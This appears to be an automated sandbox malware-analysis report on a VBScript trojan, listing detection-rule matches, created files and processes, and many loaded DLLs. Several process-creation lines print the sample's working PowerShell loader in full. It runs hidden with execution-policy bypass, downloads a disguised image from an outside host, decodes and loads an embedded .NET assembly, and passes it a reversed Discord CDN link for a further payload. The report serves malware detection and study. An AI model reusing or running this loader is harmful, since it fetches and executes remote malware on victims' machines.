TreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: file.vbsInitial sample: Strings found which are bigger than 50
          Source: Process Memory Space: powershell.exe PID: 1316, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@6/10@3/3
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ZKQQ9[1].txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw0zxkih.x55.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.vbsReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: adsnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
